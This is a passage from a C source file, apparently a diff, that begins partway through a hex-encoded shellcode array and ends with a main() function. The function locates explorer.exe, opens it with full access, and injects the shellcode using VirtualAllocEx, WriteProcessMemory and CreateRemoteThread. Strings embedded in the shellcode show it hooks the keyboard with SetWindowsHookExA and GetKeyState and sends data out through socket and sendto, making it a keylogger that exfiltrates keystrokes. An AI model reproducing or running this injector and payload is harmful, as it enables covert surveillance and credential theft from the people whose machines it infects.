4c\x01\xea\x48\x8b\x5f\x10\xff\xd3\x49\x8d\x4c\x24\x08\x48\x31\xd2\x52\x52\x41\x58\x41\x59\x48\x8b\x5f\x28\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x30\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x38\xff\xd3\xeb\xd4\x47\x65\x74\x4d\x6f\x64\x75\x6c\x65\x48\x61\x6e\x64\x6c\x65\x41\x01\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x01\x53\x65\x74\x57\x69\x6e\x64\x6f\x77\x73\x48\x6f\x6f\x6b\x45\x78\x41\x01\x43\x61\x6c\x6c\x4e\x65\x78\x74\x48\x6f\x6f\x6b\x45\x78\x01\x47\x65\x74\x4b\x65\x79\x53\x74\x61\x74\x65\x01\x47\x65\x74\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x54\x72\x61\x6e\x73\x6c\x61\x74\x65\x4d\x65\x73\x73\x61\x67\x65\x01\x44\x69\x73\x70\x61\x74\x63\x68\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x01\x73\x6f\x63\x6b\x65\x74\x01\x73\x65\x6e\x64\x74\x6f\x01\x56\x57\x41\x50\x52\x41\x51\x51\x41\x5b\x48\x31\xdb\x53\x53\x5a\x58\x8b\x59\x3c\x48\x01\xcb\xb2\x88\x8b\x04\x13\x48\x01\xc8\x48\x31\xd2\x52\x52\x52\x41\x58\x41\x59\x41\x5a\x44\x8b\x40\x20\x4d\x01\xd8\x44\x8b\x48\x24\x4d\x01\xd9\x44\x8b\x50\x1c\x4d\x01\xda\x48\x31\xd2\x48\x31\xf6\x56\x59\x41\x8b\x34\x90\x4c\x01\xde\x48\x8b\x7c\x24\x08\x48\x31\xc0\x8a\x04\x0f\x48\xff\xc1\x3c\x01\x75\xf6\x48\xff\xc2\x51\x48\xff\xc9\x48\x87\xf7\xf3\xa6\x59\x75\xd3\x48\xff\xca\x48\x8b\x7c\x24\x08\x48\x01\xcf\x48\x89\x7c\x24\x08\x48\x31\xdb\x53\x58\x66\x41\x8b\x1c\x51\x41\x8b\x04\x9a\x4c\x01\xd8\x48\x8b\x1c\x24\x48\x89\x03\x48\x83\xc3\x08\x48\x89\x1c\x24\x48\x8b\x5c\x24\x10\x48\xff\xcb\x48\x89\x5c\x24\x10\x48\x31\xd2\x48\x39\xd3\x75\x8e\x48\x83\xc4\x18\x5f\x5e\xc3\x48\x83\xec\x58\x41\x50\x52\x51\x48\x31\xf6\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x4c\x8b\x14\x34\x48\xff\xc6\x49\x39\xc2\x75\xf4\x48\x83\xc6\x07\x48\x8d\x1c\x34\x48\x8b\x3b\x4c\x8b\x63\x08\x4c\x8b\x7b\x10\x48\x85\xc9\x75\x68\x48\x31\xdb\xb3\x01\x48\xc1\xe3\x08\x48\x39\xda\x75\x5a\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x14\xff\xd3\x66\x41\x89\x04\x24\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x10\xff\xd3\x66\x41\x89\x44\x24\x02\x48\x8b\x5c\x24\x10\x8b\x03\x41\x89\x44\x24\x04\x48\x83\xec\x58\x48\x8b\x4f\x08\x41\x54\x5a\x4d\x31\xc9\x41\x51\x41\x58\x41\xb0\x10\x4c\x89\x7c\x24\x20\x4c\x89\x44\x24\x28\x49\x83\xe8\x08\x48\x8b\x5f\x50\xff\xd3\x48\x83\xc4\x58\x5a\x41\x58\x41\x59\x48\x8b\x5f\x18\x48\x31\xc9\xff\xd3\x48\x83\xc4\x58\xc3"; + + + +int main() +{ + HANDLE s,proc; + PROCESSENTRY32 ps; + BOOL process_found=0; + LPVOID shell; + SIZE_T total; + + //finding explorer.exe pid + + ps.dwSize=sizeof(ps); + + s=CreateToolhelp32Snapshot(2,0); + + if(s==INVALID_HANDLE_VALUE) + { + printf("CreateToolhelp32Snapshot() failed.Error code %d\n",GetLastError()); + return -1; + } + + if(!Process32First(s,&ps)) + { + printf("Process32First() failed.Error code %d\n",GetLastError()); + return -1; + } + + + do{ + if(0==strcmp(ps.szExeFile,"explorer.exe")) + { + process_found=1; + break; + } + }while(Process32Next(s,&ps)); + + + if(!process_found) + { + printf("Unknown Process\n"); + return -1; + } + + + //opening process using pid + + + proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID); + + if(proc==INVALID_HANDLE_VALUE) + { + printf("OpenProcess() failed.Error code %d\n",GetLastError()); + return -1; + } + + + //allocating memory process memory + + if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL) + { + printf("Failed to allocate memory into process"); + CloseHandle(proc); + return -1; + } + + + //writing shellcode into process memory + + WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total); + + if(sizeof(shellcode)!=total) + { + printf("Failed write shellcode into process memory"); + CloseHandle(proc); + return -1; + } + + + //Executing shellcode + + if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL) + { + printf("Failed to Execute shellcode"); + CloseHandle(proc); + return -1; + } + + CloseHandle(proc); + CloseHandle(s); + + return 0; + + +} \ No newline at end of file